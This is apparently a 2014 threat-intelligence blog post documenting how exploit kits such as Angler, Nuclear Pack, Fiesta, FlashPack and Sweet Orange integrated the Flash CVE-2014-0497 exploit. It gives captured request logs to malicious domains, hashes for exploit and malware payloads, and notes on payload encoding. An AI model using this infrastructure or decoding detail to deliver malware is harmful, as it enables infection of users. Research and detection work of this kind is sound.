2014-02-27 - Exploit Integration
CVE-2014-0497 (Flash up to 12.0.0.43) integrating Exploit Kits
And here we are : first CVE-2014-xxxx exploited in blind mass attack. (I was expecting the 0322 but maybe not that easy to implement)
As spotted by EKWatcher , Angler EK is introducing today a new Flash Exploit : CVE-2014-0497 identified by Timo Hirvonen from F-Secure. This vulnerability has been found exploited in targeted attack by Kaspersky and patched 22 days ago.
That exploit is more efficient than those previously found.
The samples covered by Microsoft and Kaspersky were not working properly on Flash 12.x
But it looks like the coder of that exploit found a way to bypass the mitigation preventing the execution on branch 12.x.
Angler EK : 2014-02-26
CVE-2014-0497 successful pass in Angler EK from ru8080 team : 2014-02-26 (note : Logo and name for Angler are not "official" one) |
GET http://phisoomythyxiboow .ru:8080/nf21cea1mg
200 OK (text/html)
Part of the landing after deofuscation work (credits again to EKWatcher) giving hints on which CVE to expect. |
200 OK (text/html) 2a2136743be5be61b4e929b62a7a06ea CVE-2014-0497
Flash Exploit Opened in FFDec Piece of code showing calls that does not looks really "Anglerish". Remains of debugging ? |
GET http://phisoomythyxiboow .ru:8080/EVUjxyPGW5p_MsLcWq12Y5HwY0gkVHSUamvyuIIBd4efHGTf
200 OK (application/octet-stream) Once decoded : 664e4383fcfe183edc04247f4d018e11 (GameOver Zeus )
Side notes :
- It's not just a XOR-ed Payload. As Bryan Burns figured out, one byte is modified.
XOR pass is not enough to get the Actual Payload. |
It seems the Modified data is always the Size Of Optional Header (sample open in PE Insider) |
Have no plan to search for the piece of code in charge of the modification. If you happen to work on it, I would be happy to hear about it.
- This CVE is not being served for now in "Reveton" Angler EK instances despite landing is showing the upgrade.
Same VM, few minutes between the two pass. Guess who is the VIP.... |
It's now in Angler EK from Reveton team too.
CVE-2013-0497 in Reveton Angler EK |
Files: Fiddler/sample (Owncloud via goo.gl)
Nuclear Pack : 2014-04-02
Thanks Symantec for help in confirmation.
Nuclear Pack CVE-2014-0497 Successful pass 2014-04-02 |
GET http://3d0ok0ay36113q97-7.canfut .ru/
200 OK (text/html)
NuclearPack landing. http://pastebin.com/bGgR8TKf The random Background Color is part of the obfuscation Appeared around 2014-02-24 |
Small illustration of how the bgcolor is being used |
The js after deobfuscation : http://pastebin.com/dyckC40T
Here is the part we want to see :
Flash Check (which in itself gives us good indication on the bullet that might be shot) |
GET http://1785839722-7.canfut .ru/1396402140.htm
200 OK (text/html) <- CVE-2013-2551 (IE)
GET http://1785839722-7.canfut .ru/1396402140.swf
200 OK (application/x-shockwave-flash) 26e9cf4bf96d08f3c76038f80de9a14f
CVE-2014-0497/CVE-2013-0634 SWF with a lot of meaning full function name |
GET http://1785839722-7.canfut .ru/f/1396402140/7
200 OK (application/octet-stream) f6a019b1afffc51ca34c99c19fc6d350 (
Fiesta :
Not long after CVE-2014-0322 integration CVE-2014-0497 is now in Fiesta, as spotted by Brad here.
Thanks to Arseny Levin from Trustwave Labs and to Symantec for confirmation.
CVE-2014-0497 successful pass in Fiesta 2014-04-08 |
200 OK (text/html) http://pastebin.com/CGP6RhDV (beautified)
Landing after "Beautify" and adding deobfus comments |
GET http://cdryme.in .ua/xctl5j6/?21e9da56a4a8f02341460302565a060f010150025003050d0702510a07020001;120000;38
200 OK (application/x-shockwave-flash) CVE-2014-0497 eb343c450abd625d2119b98dcc0d62d7
Piece of CVE-2014-0497 from Fiesta |
GET http://cdryme.in .ua/xctl5j6/?0c0d9b4aab02c58a59065c5f0b5907580353055f0d00045a055004575a010156
200 OK (text/html) CVE-2013-2551
GET http://cdryme.in .ua/xctl5j6/?7b29a0345fb0c67054125902530b000d045207025552030f0251060a02530603;6
200 OK (application/octet-stream) Encoded payload is : Miuref fe0ffd0bbfaec31450d82c1b38ad0ffe
GET http://cdryme.in .ua/xctl5j6/?7b29a0345fb0c67054125902530b000d045207025552030f0251060a02530603;6;1
200 OK (text/html) Call Back.
Files : Fiddler/Flash/Payload (OwnCloud )
FlashPack: 2014-04-13
CVE-2014-0497 successful pass in the "windigo gang" Flash Pack slot 2014-04-16 (monk image is avatar from vendor on Forum - he names it : Flash EK - it's a grand'son of CritX Pack) |
200 OK (text/html)
GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/js/pd.php?id=67636c6c31326e6f6e37796e6b78316674367967757a773931353935336231616131343938363336643839376234393435353930356164362e676563656b6979616665746c6572692e67656e2e7472
200 OK (text/html)
POST http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/json.php
200 OK (text/html)
Bullet chosen after the Plugin Detect : CVE-2013-2551 & CVE-2014-0497 |
GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/msie.php
200 OK (text/html) CVE-2013-2551
GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/flash2014.php
200 OK (text/html)
Call for exploit |
GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/include/64a2f.swf
200 OK (application/x-shockwave-flash) ec80266e7b2f29232e25c6f0459ede6e CVE-2014-0497
Déjà vu ? Yes. Nuclear Pack. |
It seems there are traces of CVE-2013-0634 but that exploit is not called that way in Flash Pack.
It's now flash2013.php > loadfla20013.php and another Swf.
GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/loadfla20014.php
200 OK (application/octet-stream) d271fcae3a8c1b345e3afdc45af9188d No surprise here for this gang : Glupteba
(you may want to read the stellar paper of Eset on Operation Windigo, this Flash EK Instance is what you get those days after Cdorked compromised server and few redirect)
Files : FlashEK_CVE-2014-0497_140416.zip (OwnCloud via Goo.gl)
Sweet Orange :
I heard of it by Sebastien Duquette from Eset on April 16th and got it working with a Windows 7 VM.
The exploit is not being pushed to Windows XP.
Add caption |
GET http://raserkl15.ham .cx:9290/pda/family.php?space=282
200 OK (text/html)
GET http://raserkl15.ham .cx:9290/pda/ZgaGWW
200 OK (application/x-shockwave-flash)
CVE-2014-0497 in SWT 2014-04-16 The implementation is exactly the same as the one seen in Nuclear. |
GET http://raserkl23.ham .cx:9290/action.php?ports=665&data=476&bios=4&howto=446&sports=171&lang=266&stats=765&feed=420&email=431
200 OK (application/octet-stream)
Fiddler: Here
You'll find a pcap on this post from 2014-04-20 from Malware-Traffic-Analysis.
Read more :
CVE-2014-0497 – a 0-day vulnerability - Vyacheslav Zakorzhevsky - Kaspersky - 2014-02-05
A journey to CVE-2014-0497 exploit - Chun Feng - MMPC - 2014-02-17